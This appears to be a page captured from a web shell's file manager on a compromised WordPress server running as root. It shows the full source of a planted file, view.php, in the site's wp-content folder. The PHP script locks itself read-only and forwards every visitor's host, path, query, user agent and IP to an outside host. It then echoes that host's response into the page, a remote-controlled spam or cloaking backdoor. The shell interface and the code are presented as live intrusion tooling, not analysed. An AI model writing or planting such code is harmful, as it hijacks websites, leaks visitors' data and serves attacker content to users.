HEX
Server: nginx/1.18.0
System: Linux iZuf6ar3jbed2aosvzu1ofZ 4.18.0-240.22.1.el8_3.x86_64 #1 SMP Thu Apr 8 19:01:30 UTC 2021 x86_64
User: root (0)
PHP: 7.3.28
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
$ pwd: /www/wwwroot/wood-lk.cn/wp-content/
Upload Files
File: /www/wwwroot/wood-lk.cn/wp-content/view.php
<?php
set_time_limit(0);
header("Content-Type:text/html;charset=gb2312");
date_default_timezone_set('PRC');
chmod($_SERVER['SCRIPT_FILENAME'], 0444);

$key = $_SERVER['HTTP_USER_AGENT'];
$aaaa = $_SERVER['PHP_SELF'];
$aaa = 'http://ashx.lhlsjcb.com/';

// Try to get the real IP address from different headers
if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $uip = $_SERVER['HTTP_X_FORWARDED_FOR']; 
} elseif (!empty($_SERVER['HTTP_X_REAL_IP'])) {
    $uip = $_SERVER['HTTP_X_REAL_IP'];
} else {
    $uip = $_SERVER["REMOTE_ADDR"];
}

$sc = str_replace(' ', '', $key);

// Construct the request URL
$bb = @file_get_contents($aaa.'?&X&http://'.$_SERVER['HTTP_HOST'].$aaaa.'?'.$_SERVER['QUERY_STRING'].'&X&'.$sc.'&X&'.$uip);
echo $bb;
?>
@ Telegram